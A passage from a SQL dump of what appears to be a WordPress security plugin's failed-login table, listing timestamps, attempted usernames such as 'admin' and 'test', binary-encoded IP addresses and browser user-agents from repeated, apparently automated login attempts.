Firefox/62.0'),(181,208,1624435634.127327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ո]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(182,209,1624436405.446142,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(183,211,1624437274.763371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��zrL�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(184,212,1624437983.097731,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(185,213,1624438919.318912,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����L`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(186,216,1624439712.266035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(187,217,1624440538.532038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����L`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(188,218,1624441346.758657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����vv','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(189,219,1624441414.467432,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��zrL�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(190,221,1624442253.731786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(191,222,1624443002.197712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(192,223,1624443930.137713,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(193,225,1624444799.144862,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(194,226,1624445614.032908,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��QE��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(195,227,1624445693.708215,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ψ.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(196,228,1624445993.754253,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��\'f!�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(197,229,1624447436.208738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(198,230,1624448375.905553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(199,231,1624449402.954206,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����k;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(200,232,1624450280.504741,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(201,233,1624450420.377891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(202,234,1624450421.783355,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(203,235,1624450422.523880,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(204,236,1624450423.172299,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(205,237,1624450425.118265,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(206,238,1624450426.523524,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(207,239,1624450427.342671,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(208,240,1624450428.002452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(209,241,1624450428.910783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(210,242,1624450429.554753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(211,243,1624450430.138076,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(212,244,1624450430.833941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(213,245,1624450431.334679,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(214,246,1624450432.107889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(215,247,1624450432.769789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(216,248,1624450433.280637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(217,249,1624450433.789303,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(218,250,1624450434.283181,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(219,251,1624450434.751856,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��uz�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(220,254,1624451242.353016,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(221,256,1624452185.471919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(222,258,1624453185.918556,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Hӱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(223,260,1624454257.501979,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��zrL�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(224,261,1624455245.299114,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(225,262,1624456243.018120,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(226,264,1624457318.017092,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(227,265,1624457388.123261,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���,��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(228,266,1624458305.657889,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ψ.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(229,267,1624459312.560232,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���0U�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(230,268,1624460374.164979,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(231,270,1624461483.090632,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(232,282,1624474135.353870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��zt�J','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(233,284,1624474375.630926,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(234,285,1624474797.647692,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���4�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(235,288,1624480597.239686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{�?','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(236,290,1624484777.556322,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(237,291,1624484778.340315,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(238,292,1624484779.110197,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(239,293,1624484783.231402,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(240,294,1624484786.489049,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(241,295,1624484788.519809,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(242,296,1624484789.070111,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(243,297,1624484789.771014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(244,298,1624484791.508422,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(245,299,1624484794.543051,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(246,299,1624484797.058317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(247,300,1624484799.082074,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(248,301,1624484800.633124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(249,301,1624484800.726210,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(250,302,1624484802.527514,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(251,303,1624484804.304721,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(252,304,1624484805.560091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(253,305,1624484808.550893,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(254,306,1624484809.748193,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(255,308,1624487086.952203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ʬ\Z','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(256,310,1624493691.319406,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(257,312,1624500780.904773,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(258,313,1624500790.154024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(259,314,1624500793.414329,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(260,315,1624500795.729054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(261,316,1624500798.026227,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(262,317,1624500799.378907,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(263,318,1624500800.469848,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(264,318,1624500800.596857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(265,319,1624500801.991605,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(266,319,1624500802.080428,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(267,320,1624500803.111375,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(268,321,1624500804.253157,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(269,322,1624500805.248630,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(270,322,1624500805.308356,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(271,323,1624500806.288769,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(272,323,1624500806.364657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(273,324,1624500807.469195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(274,325,1624500809.212327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(275,326,1624500810.323790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����η','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(276,331,1624505986.185831,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(277,332,1624506898.475598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w`�;','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(278,332,1624506898.501763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w`�;','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(279,333,1624507212.443915,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Hӱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(280,336,1624511172.947788,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(281,338,1624513082.286999,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��_�H�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(282,339,1624513564.880011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(283,340,1624514194.918438,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(284,341,1624515784.434331,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(285,343,1624517365.109060,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���AA�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(286,344,1624518639.912676,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(287,347,1624519014.172141,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(288,348,1624519071.125572,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��£�&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(289,352,1624519483.689858,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(290,356,1624519860.097092,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��E1�^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(291,360,1624520349.241958,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��R�.�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(292,361,1624520373.969308,1,'loginFailInvalidUsername','testtest',0,'\0\0\0\0\0\0\0\0\0\0���\"8v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(293,363,1624520569.732172,1,'loginFailInvalidUsername','test123',0,'\0\0\0\0\0\0\0\0\0\0����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(294,365,1624520723.693452,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3O��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(295,366,1624520770.827935,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��g�P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(296,370,1624521162.344115,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0���8�T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(297,377,1624522102.664040,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(298,381,1624522465.972416,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��Ra\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(299,382,1624522510.262517,1,'loginFailInvalidUsername','123456789',0,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(300,382,1624522510.301555,1,'loginFailInvalidUsername','123456789',0,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(301,383,1624522602.626240,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���E4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(302,393,1624523619.875873,1,'loginFailInvalidUsername','jsjobs_jobseeker',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux 